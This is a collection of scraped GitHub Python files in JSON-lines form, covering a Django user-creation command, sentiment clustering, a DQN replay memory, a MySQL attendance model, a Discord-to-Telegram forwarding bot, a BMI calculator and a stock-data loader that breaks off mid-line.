+{"seq_id":"30890144848","text":"import logging\n\nfrom bkpaas_auth.models import DatabaseUser\nfrom django.core.management.base import BaseCommand\n\nfrom paasng.infras.accounts.constants import SiteRole\nfrom paasng.infras.accounts.models import AuthenticatedAppAsUser, User, UserProfile\n\nlogger = logging.getLogger('commands')\n\nROLE_CHOICES = [\n SiteRole.SYSTEM_API_BASIC_READER.value,\n SiteRole.SYSTEM_API_BASIC_MAINTAINER.value,\n SiteRole.SYSTEM_API_LIGHT_APP_MAINTAINER.value,\n SiteRole.SYSTEM_API_LESSCODE.value,\n]\n\n\nclass Command(BaseCommand):\n help = (\n \"Add an user which can be authenticated an by verified apps, overwrite old records when \"\n \"bk_app_code already exists\"\n )\n\n def add_arguments(self, parser):\n parser.add_argument(\"--bk_app_code\", required=True, type=str, help=\"application code\")\n parser.add_argument(\n \"--username\",\n required=False,\n type=str,\n help=\"username, if not given use '{bk-app-code}-sys-user' by default\",\n )\n parser.add_argument(\n \"--role\",\n required=False,\n type=int,\n choices=ROLE_CHOICES,\n default=SiteRole.SYSTEM_API_BASIC_READER.value,\n help=(\n 'User role, choices: 50 - \"basic reader\"(default); '\n '60 - \"basic maintainer\"; 70 - \"light app maintainer\".'\n ),\n )\n\n def handle(self, *args, **options):\n bk_app_code = options['bk_app_code']\n username = options['username'] or self._get_default_username(bk_app_code)\n # Create user\n user_db, _ = User.objects.get_or_create(username=username)\n logger.info(f'user: {user_db.username} created.')\n\n # Create profile with role\n user = DatabaseUser.from_db_obj(user_db)\n UserProfile.objects.update_or_create(user=user.pk, defaults={'role': options['role']})\n logger.info(f'profile: {user.pk}({user.username}) created.')\n\n # Create relationship\n AuthenticatedAppAsUser.objects.update_or_create(\n bk_app_code=bk_app_code, defaults={'user': user_db, 'is_active': True}\n )\n logger.info(f'app-user relation: {bk_app_code}-{user.username} created.')\n\n @staticmethod\n def _get_default_username(bk_app_code: str) -> str:\n return f'authed-app-{bk_app_code}'\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/infras/accounts/management/commands/create_authed_app_user.py","file_name":"create_authed_app_user.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"24581476150","text":"from argparse import ArgumentParser\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.metrics import homogeneity_score, completeness_score\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport nltk\nimport collections\nimport numpy as np\nimport sys\nimport os\n\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Normalizer\n\nos.environ['KERAS_BACKEND'] = 'theano'\nsys.path.append('./socialsent3')\n\nfrom socialsent3.polarity_induction_methods import random_walk\nfrom socialsent3.representations.representation_factory import create_representation\nfrom socialsent3.util import dict2csv\nfrom socialsent3 import seeds\n\n\ndef parse_arguments():\n parser = ArgumentParser()\n parser.add_argument('--train', default='./data/imdb/train.tsv', dest='TRAIN',\n help='File containing training data')\n parser.add_argument('--test', default='./data/imdb/val.tsv', dest='TEST',\n help='File containing testing data')\n parser.add_argument('--embed', default='./data/embeddings/imdb.en.vec', dest='EMBED',\n help='File containing word embedding')\n parser.add_argument('--cutoff', default=40, type=int, dest='CUTOFF',\n help='Number of most positive and negative words to filter out.')\n parser.add_argument('--lsa', dest='LSA', type=int, default=0,\n help='LSA reduction size')\n parser.add_argument('--algo', dest='ALGO', default=None)\n return parser.parse_args()\n\n\nHALF_LEN = 2\n\n\ndef sent2rep(sent, word_list=None, **kwargs):\n words = nltk.word_tokenize(sent)\n # noinspection PyArgumentList\n counter = collections.Counter(words)\n rep = np.zeros(len(word_list))\n for i, word in enumerate(word_list):\n rep[i] = counter.get(word, 0)\n # rep[i] = 1 if word in counter.keys() else 0\n\n return rep\n\n\ndef evaluate(true_labels, pred_labels):\n print('Homogeneity score: %.3f' % homogeneity_score(true_labels, pred_labels))\n print('Completeness score: %.3f' % completeness_score(true_labels, pred_labels))\n\n\ndef filter_polarities(polarities: dict, cutoff):\n l = polarities.items()\n sorted_l = sorted(l, key=lambda it: it[1])\n\n neg = sorted_l[:cutoff]\n # neg = []\n pos = sorted_l[-cutoff:]\n newp = dict(neg + pos)\n\n return newp\n\n\ndef main(args):\n print('Loading data...')\n train_sents, train_labels = [], []\n with open(args.TRAIN, 'rt') as f:\n lines = f.readlines()\n for l in lines:\n cols = l.split('\\t')\n train_labels.append(1 if cols[0] == 'Positive' else 0)\n train_sents.append(cols[1].strip())\n\n test_sents, test_labels = [], []\n with open(args.TEST, 'rt') as f:\n lines = f.readlines()\n for l in lines:\n cols = l.split('\\t')\n test_labels.append(1 if cols[0] == 'Positive' else 0)\n test_sents.append(cols[1].strip())\n\n pos_seeds, neg_seeds = seeds.review_seeds()\n print('Creating word vectors...')\n embeddings = create_representation(\"FULL\", args.EMBED, 100,\n limit=50000)\n print('Calculating polarities...')\n polarities = random_walk(embeddings, pos_seeds, neg_seeds, beta=0.99, nn=10,\n sym=True, arccos=True)\n\n print('Filtering polarities...')\n polarities = filter_polarities(polarities, args.CUTOFF)\n\n print('Storing polarities...')\n dict2csv(polarities, path='./data/polarities/filtered.csv')\n\n word_list = list(polarities.keys())\n train_reps, test_reps = [], []\n\n if args.ALGO == 'tf-idf':\n tfidf = TfidfVectorizer(vocabulary=word_list, tokenizer=nltk.word_tokenize)\n\n print('Creating training sentence representations...')\n train_reps = tfidf.fit_transform(train_sents)\n\n print('Creating testing sentence representations...')\n test_reps = tfidf.fit_transform(test_sents)\n else:\n print('Creating training sentence representations...')\n for i, sent in enumerate(train_sents):\n print('\\t%d/%d' % (i + 1, len(train_sents)), end='\\r')\n rep = sent2rep(sent, word_list=word_list)\n train_reps.append(rep)\n print()\n\n print('Creating testing sentence representations...')\n for i, sent in enumerate(test_sents):\n print('\\t%d/%d' % (i + 1, len(test_sents)), end='\\r')\n rep = sent2rep(sent, word_list=word_list)\n test_reps.append(rep)\n print()\n\n if args.LSA != 0:\n print('Transforming w/ LSA...')\n svd = TruncatedSVD(args.LSA)\n normalizer = Normalizer(copy=False)\n lsa = make_pipeline(svd, normalizer)\n\n train_reps = lsa.fit_transform(train_reps)\n test_reps = lsa.fit_transform(test_reps)\n\n km = KMeans(n_clusters=2, verbose=1, max_iter=10000)\n train_preds = km.fit_predict(train_reps)\n test_preds = km.predict(test_reps)\n\n print('\\nMetrics on train set:')\n evaluate(train_labels, train_preds)\n print('\\nMetrics on test set:')\n evaluate(test_labels, test_preds)\n\n\nif __name__ == '__main__':\n main(parse_arguments())\n","repo_name":"VNGResearch/sentiment-analysis","sub_path":"kmeans2.py","file_name":"kmeans2.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"6135850246","text":"import bisect\nimport math\nimport random\n\nclass Sample:\n \n def __init__(self, state1, action, reward, state2, terminal):\n self.state1 = state1\n self.action = action\n self.reward = reward\n self.state2 = state2\n self.terminal = terminal\n self.weight = 1\n self.cumulativeWeight = 1\n\n def isInteresting(self):\n return self.terminal or self.reward != 0\n\n def __cmp__(self, obj):\n return self.cumulativeWeight - obj.cumulativeWeight\n\n\nclass ReplayMemory:\n \n def __init__(self, args):\n self.samples = []\n self.maxSamples = args.replay_capacity\n self.prioritizedReplay = args.prioritized_replay\n self.numInterestingSamples = 0\n self.batchesDrawn = 0\n\n def numSamples():\n return len(self.samples)\n\n def addSample(self, sample):\n self.samples.append(sample)\n self._updateWeightsForNewlyAddedSample()\n self._truncateListIfNecessary()\n\n def _updateWeightsForNewlyAddedSample(self):\n if len(self.samples) > 1:\n self.samples[-1].cumulativeWeight = self.samples[-1].weight + self.samples[-2].cumulativeWeight\n\n if self.samples[-1].isInteresting():\n self.numInterestingSamples += 1\n \n # Boost the neighboring samples. How many samples? Roughly the number of samples\n # that are \"uninteresting\". Meaning if interesting samples occur 3% of the time, then boost 33\n uninterestingSampleRange = max(1, len(self.samples) / max(1, self.numInterestingSamples))\n for i in range(uninterestingSampleRange, 0, -1):\n index = len(self.samples) - i\n if index < 1:\n break\n # This is an exponential that ranges from 3.0 to 1.01 over the domain of [0, uninterestingSampleRange]\n # So the interesting sample gets a 3x boost, and the one furthest away gets a 1% boost\n boost = 1.0 + 3.0/(math.exp(i/(uninterestingSampleRange/6.0)))\n self.samples[index].weight *= boost\n self.samples[index].cumulativeWeight = self.samples[index].weight + self.samples[index - 1].cumulativeWeight\n \n def _truncateListIfNecessary(self):\n # premature optimizastion alert :-), don't truncate on each\n # added sample since (I assume) it requires a memcopy of the list (probably 8mb)\n if len(self.samples) > self.maxSamples * 1.05:\n truncatedWeight = 0\n # Before truncating the list, correct self.numInterestingSamples, and prepare\n # for correcting the cumulativeWeights of the remaining samples\n for i in range(self.maxSamples, len(self.samples)):\n truncatedWeight += self.samples[i].weight\n if self.samples[i].isInteresting():\n self.numInterestingSamples -= 1\n\n # Truncate the list\n self.samples = self.samples[(len(self.samples) - self.maxSamples):]\n \n # Correct cumulativeWeights\n for sample in self.samples:\n sample.cumulativeWeight -= truncatedWeight\n \n def drawBatch(self, batchSize):\n if batchSize > len(self.samples):\n raise IndexError('Too few samples (%d) to draw a batch of %d' % (len(self.samples), batchSize))\n \n self.batchesDrawn += 1\n \n if self.prioritizedReplay:\n return self._drawPrioritizedBatch(batchSize)\n else:\n return random.sample(self.samples, batchSize)\n\n # The nature paper doesn't do this but they mention the idea.\n # This particular approach and the weighting I am using is a total\n # uninformed fabrication on my part. There is probably a more\n # principled way to do this\n def _drawPrioritizedBatch(self, batchSize):\n batch = []\n probe = Sample(None, 0, 0, None, False)\n while len(batch) < batchSize:\n probe.cumulativeWeight = random.uniform(0, self.samples[-1].cumulativeWeight)\n index = bisect.bisect_right(self.samples, probe, 0, len(self.samples) - 1)\n sample = self.samples[index]\n sample.weight = max(1, .8 * sample.weight)\n if sample not in batch:\n batch.append(sample)\n\n if self.batchesDrawn % 100 == 0:\n cumulative = 0\n for sample in self.samples:\n cumulative += sample.weight\n sample.cumulativeWeight = cumulative\n return batch\n \n def _printBatchWeight(self, batch):\n batchWeight = 0\n for i in range(0, len(batch)):\n batchWeight += batch[i].weight\n print('batch weight: %f' % batchWeight)\n","repo_name":"gtoubassi/dqn-atari","sub_path":"replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"32"} +{"seq_id":"43665490335","text":"import string\r\n\r\n\r\ndef default_hasher(value, table_size):\r\n character_set = ''.join(\r\n list(str(i) for i in range(10))) + ' ' + string.ascii_lowercase + string.punctuation.replace('\\\\', '')\r\n char_to_index = {char: index for index, char in enumerate(character_set)}\r\n\r\n value = value.lower()\r\n res = sum(char_to_index[char] * pow(31, i) for i, char in enumerate(value[::-1], start=1))\r\n\r\n return res % table_size\r\n","repo_name":"Pr1ncee/AOIS","sub_path":"lab6/src/hasher.py","file_name":"hasher.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44244434829","text":"import pymysql.cursors\nfrom util.db import get_connection\n\nclass Attendance_Master:\n\n # constructor\n def __init__(self, user_id = \"\", summary = \"\", start_time = \"\", end_time = \"\", rest_time = \"\", work_time = \"\"):\n self.conn = get_connection()\n self.user_id = user_id\n self.summary = summary\n self.start_time = start_time\n self.end_time = end_time\n self.rest_time = rest_time\n self.work_time = work_time\n \n # ユーザIDで勤怠マスタを取得\n def get_by_id(self, user_id):\n\n # 勤怠マスタ取得\n try:\n with self.conn.cursor() as cursor:\n sql = \"SELECT * FROM attendance_master WHERE user_id = %s\"\n cursor.execute(sql, user_id)\n result = cursor.fetchone()\n finally:\n self.conn.close()\n\n # 勤怠マスタがない場合はデフォルト値をセット\n if not result:\n return Attendance_Master(\n user_id=user_id,\n summary=\"作業\",\n start_time=\"09:00\",\n end_time=\"18:00\",\n rest_time=\"01:00\",\n work_time=\"08:00\"\n )\n \n # 勤怠マスタを返却\n return Attendance_Master(\n user_id=result['user_id'],\n summary=result['summary'],\n start_time=result['start_time'],\n end_time=result['end_time'],\n rest_time=result['rest_time'],\n work_time=result['work_time']\n )\n\n # ユーザIDで勤怠マスタを取得\n def save(self):\n\n # 勤怠の存在チェック\n check = self.check_attendance_master(self.user_id)\n\n # 勤怠マスタ取得\n try:\n with self.conn.cursor() as cursor:\n\n # 勤怠がなかった場合はinsertする\n if not check:\n # insert\n sql = \"INSERT INTO attendance_master (`user_id`, `summary`, `start_time`, `end_time`, `rest_time`, `work_time`) VALUES (%s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, (self.user_id, self.summary, self.start_time, self.end_time, self.rest_time, self.work_time))\n self.conn.commit()\n else:\n # update\n sql = \"UPDATE attendance_master SET `user_id`= %s, `summary`= %s, `start_time`= %s, `end_time`= %s, `rest_time`= %s, `work_time`= %s WHERE user_id = %s\"\n cursor.execute(sql, (self.user_id, self.summary, self.start_time, self.end_time, self.rest_time, self.work_time, self.user_id))\n self.conn.commit()\n finally:\n self.conn.close()\n\n # 勤怠マスタの存在チェック\n def check_attendance_master(self, user_id):\n with self.conn.cursor() as cursor:\n sql = \"SELECT * FROM attendance_master WHERE user_id = %s\"\n cursor.execute(sql, user_id)\n result = cursor.fetchone()\n\n if not result:\n return False\n\n return True\n","repo_name":"yugeee/forgotten_api","sub_path":"models/attendance_master.py","file_name":"attendance_master.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19233210171","text":"\"\"\"Functional tests for PDFs in pdf folder.\"\"\"\n\nfrom datetime import datetime\n\nfrom libpdf import load\nfrom libpdf.models.chapter import Chapter\nfrom libpdf.models.file import File, FileMeta\nfrom libpdf.models.horizontal_box import HorizontalBox\nfrom libpdf.models.page import Page\nfrom libpdf.models.paragraph import Paragraph\nfrom libpdf.models.position import Position\nfrom libpdf.models.root import Root\nfrom libpdf.models.table import Cell, Table\n\nfrom tests.conftest import PDF_LOREM_IPSUM\n\n\ndef test_lorem_ipsum():\n \"\"\"Test if the library reads all content from input PDF correctly.\"\"\"\n file = File(name='lorem-ipsum.pdf', path='/home/marco/ub/libpdf/tests/pdf/lorem-ipsum.pdf', page_count=2)\n file_meta = FileMeta(\n author=None,\n title=None,\n subject=None,\n creator='LaTeX with hyperref package',\n producer='pdfTeX-1.40.16',\n keywords=None,\n creation_date=datetime(2017, 5, 9, 13, 57, 58),\n modified_date=datetime(2017, 5, 9, 13, 57, 58),\n trapped=False,\n )\n file.file_meta = file_meta\n # file_meta.b_file = file # does not yet work because field is missing\n root = Root(file=file, pages=[], content=[])\n\n # reverse engineer content to make full comarison\n # create object first\n dummy_page = Page(1, 700, 900)\n dummy_pos = Position(10, 10, 20, 20, dummy_page)\n dummy_links = []\n dummy_hbox = HorizontalBox(None)\n cell1_1 = Cell(1, 1, dummy_pos, dummy_links, textbox=dummy_hbox)\n cell2_6 = Cell(2, 6, dummy_pos, dummy_links, textbox=dummy_hbox)\n cell6_2 = Cell(6, 2, dummy_pos, dummy_links, textbox=dummy_hbox)\n cell18_7 = Cell(18, 7, dummy_pos, dummy_links, textbox=dummy_hbox)\n table1 = Table(idx=1, cells=[cell1_1, cell2_6, cell6_2, cell18_7], position=dummy_pos)\n paragraph1 = Paragraph(\n idx=1,\n links=dummy_links,\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n chapter1 = Chapter(\n title='Ipsum labore ut consectetur.',\n number='1',\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n chapter2 = Chapter(\n title='Quiquia adipisci numquam tempora dolore magnam.',\n number='2',\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n chapter2_1 = Chapter(\n title='Etincidunt consectetur porro velit sed quaerat.',\n number='2.1',\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n\n # create the right, ordered structure\n chapter2.content.append(chapter2_1) # chapter2_1 is below chapter2\n root.content.append(table1) # comes first\n root.content.append(paragraph1) # comes before first chapter\n root.content.append(chapter1)\n root.content.append(chapter2)\n\n # load PDF\n objects = load(PDF_LOREM_IPSUM)\n del objects # make pylint happy until implementation is finished\n\n # compare properties\n","repo_name":"useblocks/libpdf","sub_path":"tests/test_details.py","file_name":"test_details.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"14256172173","text":"import discord\nimport telegram\nimport os\n\n# Discord client setup\ndiscord_token = 'YOUR_DISCORD_TOKEN_HERE'\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('Discord client is ready.')\n\n@client.event\nasync def on_message(message):\n if message.channel.id == 'TARGET_DISCORD_CHANNEL_ID_HERE':\n telegram_bot_token = os.environ['TELEGRAM_BOT_TOKEN']\n telegram_chat_id = os.environ['TELEGRAM_CHAT_ID']\n\n telegram_bot = telegram.Bot(token=telegram_bot_token)\n try:\n if message.content:\n telegram_bot.send_message(chat_id=telegram_chat_id, text=message.content)\n \n for attachment in message.attachments:\n telegram_bot.send_photo(chat_id=telegram_chat_id, photo=attachment.url)\n\n print('Message has been forwarded to Telegram.')\n except Exception as e:\n print(f'Error forwarding message to Telegram: {e}')\n\n# Telegram bot setup\ndef start(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Started the bot!\")\n\nif __name__ == '__main__':\n telegram_bot_token = os.environ['TELEGRAM_BOT_TOKEN']\n updater = telegram.ext.Updater(token=telegram_bot_token, use_context=True)\n\n dispatcher = updater.dispatcher\n\n start_handler = telegram.ext.CommandHandler('start', start)\n dispatcher.add_handler(start_handler)\n\n updater.start_polling()\n","repo_name":"bhau7233/tg-resending-bot-repo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34334708678","text":"\"\"\"\nThe Body Mass Index (BMI) is one of the calculations used by doctors to assess an adult's health. The doctor measures the patient's height (in metres) and weight (in kilograms), then calculates the BMI using the formula:\n\n\\[BMI = \\frac{weight}{height \\times height}\\]\n\nWrite a program which takes the patient's weight and height as input, calculates the BMI, and displays the corresponding message from the table below.\nBMI Category \tMessage\nMore than \\(25\\) \tOverweight\nBetween \\(18.5\\) and \\(25.0\\) (inclusive) \tNormal weight\nLess than \\(18.5\\) \tUnderweight\n\"\"\"\n\nmyList = [float(input()), float(input())]\n\nbmi = myList[0]/(myList[1]*myList[1])\n\nif bmi > 25:\n print(\"Overweight\")\nelif bmi < 18.5:\n print(\"Underweight\")\nelse:\n print(\"Normal weight\")\n","repo_name":"JohnNajm/DMOJ","sub_path":"CCC/CCC '08 J1 - Body Mass Index.py","file_name":"CCC '08 J1 - Body Mass Index.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26163045603","text":"\nfrom datetime import datetime\nfrom pandas import DataFrame\nfrom src.tools.mongo_data_manager import MongoDataManager\nfrom datetime import datetime\nfrom src.stock_analizer.yahoo_finance.adjuster import Adjuster\nfrom src.tools.converter import Converter\nfrom pandas_datareader import data\nfrom pandas_datareader import Options\nimport pandas as pd\nfrom numpy import *\nimport sys\nimport os\n\n\nclass StockPricesDataManager(MongoDataManager):\n \"\"\"\n Manages company data writing and reading.\n \"\"\"\n\n PRICE_COLLECTION = \"stock_prices\"\n\n def __init__(self, database: str):\n MongoDataManager.__init__(self, database)\n self.collection = StockPricesDataManager.PRICE_COLLECTION\n\n @staticmethod\n def load_company_data(url: str):\n \"\"\"\n Loads data from csv file into numpy ndarray\n :param company: company name as string\n \"\"\"\n prices = []\n file = open(url)\n next(file)\n for line in file.readlines():\n line_elements = line.strip().split(',')\n if '' in line_elements:\n continue\n else:\n prices.append(array([Converter.string_to_date(line_elements[0]) ,float(line_elements[1]), float(line_elements[2]), float(line_elements[3]), float(line_elements[4]), float(line_elements[5]), str(line_elements[6])], dtype=object))\n return array(prices)\n\n @staticmethod\n def stocks_data_to_csv(stock_name: str, stock_companies: list, start_date: datetime, end_date: datetime, folder: str):\n \"\"\"\n Stores data from the web into csv files.\n :param company: stock name as a str from we want to get the data.\n :param stock_companies: stock companies names as strings\n \"\"\"\n not_parsed = []\n for i, company in enumerate(stock_companies):\n # company_df = data.DataReader(stock_name + ':{0}'.format(company), 'finance', start_date, end_date)\n company_df = data.DataReader([company], 'google', start_date, end_date)\n company_df = Adjuster.data_weekends_and_miss_data_adj(company_df, start_date, end_date, str(company))\n company_df['Name'] = company\n stock_companies_size = len(stock_companies)\n output_name = folder + company + '_' + str(stock_companies_size) + '_' + str(start_date.year) + '_' + str(end_date.year) + '_data.csv'\n company_df.to_csv(output_name)\n print(\"{} : parsed\".format(company))\n print(\"Companies not parsed: {}\".format(not_parsed))\n\n def stocks_data_to_mongo(self, collection: str, json_items: str):\n \"\"\"\n Saves data from csv files into mongo db.\n After parsing, removes data from the folder.\n \"\"\"\n self.save_items(collection, json_items)\n\n @staticmethod\n def get_s_and_p_names():\n \"\"\"\n Returns list with all S&P companies names.\n \"\"\"\n s_and_p = ['MMM', 'ABT', 'ABBV', 'ACN', 'ATVI', 'AYI', 'ADBE', 'AMD', 'AAP', 'AES',\n 'AET', 'AMG', 'AFL', 'A', 'APD', 'AKAM', 'ALK', 'ALB', 'ARE', 'ALXN', 'ALGN', 'ALLE',\n 'AGN', 'ADS', 'LNT', 'ALL', 'GOOGL', 'GOOG', 'MO', 'AMZN', 'AEE', 'AAL', 'AEP', 'AXP',\n 'AIG', 'AMT', 'AWK', 'AMP', 'ABC', 'AME', 'AMGN', 'APH', 'APC', 'ADI', 'ANDV', 'ANSS',\n 'ANTM', 'AON', 'AOS', 'APA', 'AIV', 'AAPL', 'AMAT', 'ADM', 'ARNC', 'AJG', 'AIZ', 'T',\n 'ADSK', 'ADP', 'AZO', 'AVB', 'AVY', 'BHGE', 'BLL', 'BAC', 'BK', 'BCR', 'BAX', 'BBT',\n 'BDX', 'BRK.B', 'BBY', 'BIIB', 'BLK', 'HRB', 'BA', 'BWA', 'BXP', 'BSX', 'BHF', 'BMY',\n 'AVGO', 'BF.B', 'CHRW', 'CA', 'COG', 'CPB', 'COF', 'CAH', 'CBOE', 'KMX', 'CCL', 'CAT',\n 'CBG', 'CBS', 'CELG', 'CNC', 'CNP', 'CTL', 'CERN', 'CF', 'SCHW', 'CHTR', 'CHK', 'CVX',\n 'CMG', 'CB', 'CHD', 'CI', 'XEC', 'CINF', 'CTAS', 'CSCO', 'C', 'CFG', 'CTXS', 'CLX',\n 'CME', 'CMS', 'COH', 'KO', 'CTSH', 'CL', 'CMCSA', 'CMA', 'CAG', 'CXO', 'COP', 'ED',\n 'STZ', 'COO', 'GLW', 'COST', 'COTY', 'CCI', 'CSRA', 'CSX', 'CMI', 'CVS', 'DHI', 'DHR',\n 'DRI', 'DVA', 'DE', 'DLPH', 'DAL', 'XRAY', 'DVN', 'DLR', 'DFS', 'DISCA', 'DISCK', 'DISH',\n 'DG', 'DLTR', 'D', 'DOV', 'DOW', 'DPS', 'DTE', 'DRE', 'DD', 'DUK', 'DXC', 'ETFC', 'EMN',\n 'ETN', 'EBAY', 'ECL', 'EIX', 'EW', 'EA', 'EMR', 'ETR', 'EVHC', 'EOG', 'EQT', 'EFX',\n 'EQIX', 'EQR', 'ESS', 'EL', 'ES', 'RE', 'EXC', 'EXPE', 'EXPD', 'ESRX', 'EXR', 'XOM',\n 'FFIV', 'FB', 'FAST', 'FRT', 'FDX', 'FIS', 'FITB', 'FE', 'FISV', 'FLIR', 'FLS', 'FLR',\n 'FMC', 'FL', 'F', 'FTV', 'FBHS', 'BEN', 'FCX', 'GPS', 'GRMN', 'IT', 'GD', 'GE', 'GGP',\n 'GIS', 'GM', 'GPC', 'GILD', 'GPN', 'GS', 'GT', 'GWW', 'HAL', 'HBI', 'HOG', 'HRS', 'HIG',\n 'HAS', 'HCA', 'HCP', 'HP', 'HSIC', 'HSY', 'HES', 'HPE', 'HLT', 'HOLX', 'HD', 'HON',\n 'HRL', 'HST', 'HPQ', 'HUM', 'HBAN', 'IDXX', 'INFO', 'ITW', 'ILMN', 'IR', 'INTC', 'ICE',\n 'IBM', 'INCY', 'IP', 'IPG', 'IFF', 'INTU', 'ISRG', 'IVZ', 'IRM', 'JEC', 'JBHT', 'SJM',\n 'JNJ', 'JCI', 'JPM', 'JNPR', 'KSU', 'K', 'KEY', 'KMB', 'KIM', 'KMI', 'KLAC', 'KSS', 'KHC',\n 'KR', 'LB', 'LLL', 'LH', 'LRCX', 'LEG', 'LEN', 'LVLT', 'LUK', 'LLY', 'LNC', 'LKQ', 'NYSE:LMT',\n 'L', 'LOW', 'LYB', 'MTB', 'MAC', 'M', 'MRO', 'MPC', 'MAR', 'MMC', 'MLM', 'MAS', 'MA', 'MAT',\n 'MKC', 'MCD', 'MCK', 'MDT', 'MRK', 'MET', 'MTD', 'MGM', 'KORS', 'MCHP', 'MU', 'MSFT', 'MAA',\n 'MHK', 'TAP', 'MDLZ', 'MON', 'MNST', 'MCO', 'MS', 'MOS', 'MSI', 'MYL', 'NDAQ', 'NOV', 'NAVI',\n 'NTAP', 'NFLX', 'NYSE:NWL', 'NFX', 'NEM', 'NWSA', 'NWS', 'NEE', 'NLSN', 'NKE', 'NI', 'NYSE:NBL',\n 'JWN',\n 'NSC', 'NTRS', 'NOC', 'NRG', 'NUE', 'NVDA', 'ORLY', 'OXY', 'OMC', 'OKE', 'ORCL', 'PCAR',\n 'PKG', 'PH', 'PDCO', 'PAYX', 'PYPL', 'PNR', 'PBCT', 'PEP', 'PKI', 'PRGO', 'PFE', 'PCG', 'PM',\n 'PSX', 'PNW', 'PXD', 'PNC', 'RL', 'PPG', 'PPL', 'PX', 'PCLN', 'PFG', 'PG', 'PGR', 'PLD', 'PRU',\n 'PEG', 'PSA', 'PHM', 'PVH', 'QRVO', 'PWR', 'QCOM', 'DGX', 'RRC', 'RJF', 'RTN', 'O', 'RHT', 'REG',\n 'REGN', 'RF', 'RSG', 'RMD', 'RHI', 'ROK', 'COL', 'ROP', 'ROST', 'RCL', 'CRM', 'SCG', 'SLB', 'SNI',\n 'STX', 'SEE', 'SRE', 'SHW', 'SIG', 'SPG', 'SWKS', 'SLG', 'SNA', 'SO', 'LUV', 'SPGI', 'SWK', 'SPLS',\n 'SBUX', 'STT', 'SRCL', 'SYK', 'STI', 'SYMC', 'SYF', 'SNPS', 'SYY', 'TROW', 'TGT', 'TEL', 'FTI',\n 'TXN', 'TXT', 'TMO', 'TIF', 'TWX', 'TJX', 'TMK', 'TSS', 'TSCO', 'TDG', 'TRV', 'TRIP', 'FOXA',\n 'FOX', 'TSN', 'UDR', 'ULTA', 'USB', 'UA', 'UAA', 'UNP', 'UAL', 'UNH', 'UPS', 'URI', 'UTX', 'UHS',\n 'UNM', 'VFC', 'VLO', 'VAR', 'VTR', 'VRSN', 'VRSK', 'VZ', 'VRTX', 'VIAB', 'V', 'VNO', 'VMC', 'WMT',\n 'WBA', 'DIS', 'WM', 'WAT', 'WEC', 'WFC', 'HCN', 'WDC', 'WU', 'WRK', 'WY', 'WHR', 'WFM', 'WMB',\n 'WLTW', 'WYN', 'WYNN', 'XEL', 'XRX', 'XLNX', 'XL', 'XYL', 'YUM', 'ZBH', 'ZION', 'ZTS']\n return s_and_p\n\n @staticmethod\n def load_dividends(comps_list: list, start_date: datetime, end_date: datetime):\n \"\"\"\n Loads companies dividends\n \"\"\"\n folder = \"../../resources/Stock Data/Company Dividends/\"\n print(\"Dividends parsing...\")\n for comp_name in comps_list:\n url = str(folder) + str(comp_name) + \"_data.csv\"\n try:\n f = data.DataReader(comp_name, 'yahoo-dividends', start_date, end_date)\n dividends = f[\"Dividends\"]\n if len(dividends) != 0:\n dividends.to_csv(url)\n print(\"Dividends for: {} parsed.\".format(comp_name))\n except:\n print(\"Problems with: {}\".format(comp_name))\n\n @staticmethod\n def load_options(comp_names: list):\n \"\"\"\n Loads instrument options\n \"\"\"\n folder = \"../../resources/Stock Data/Company Options/\"\n time = datetime.now()\n print(\"Options parsing...\")\n for comp_name in comp_names:\n try:\n url = str(folder) + str(comp_name) + \"_data.csv\"\n inst_options = Options(comp_name, 'yahoo')\n inst_options_data = inst_options.get_all_data()\n inst_options_data.to_csv(url)\n print(\"Options for : {} parsed.\".format(comp_name))\n except:\n print(\"Problems with: {}\".format(comp_name))\n\n def save_comp(self, comp_name, comp_data):\n \"\"\"\n Saves company data\n \"\"\"\n self.save_items(comp_name, comp_data)\n\n def load_comp_data(self, collection: str, comp_name: str):\n \"\"\"\n Loads all data associated with specified company\n \"\"\"\n query = {\"Name\" : comp_name}\n return self.load_items(collection, query)\n\n def load_comps_data_btn_dates(self, collection: str, comp_names: list, start_date: datetime, end_date: datetime):\n \"\"\"\n Loads all data associated with specified companies.\n \"\"\"\n if start_date == None or end_date == None:\n comp_names = [{\"Name\": comp_name} for comp_name in comp_names]\n # query = {\"$or\": [{\"Name\": \"NSC\"}, {\"Name\": \"MMM\"}]}\n query = {\"$or\": comp_names}\n else:\n comp_names = [{\"Name\": comp_name} for comp_name in comp_names]\n query = {\"$and\" : [{\"$or\": comp_names}, {\"Date\" : {\"$gte\": start_date, \"$lt\" : end_date}}]}\n return self.load_items(collection, query)\n\n def load_comp_data_btn_dates(self, comp_name: str, start_date: datetime, end_date: datetime):\n \"\"\"\n Loads company data between specified date range.\n \"\"\"\n query = {'Name': comp_name, \"Date\" 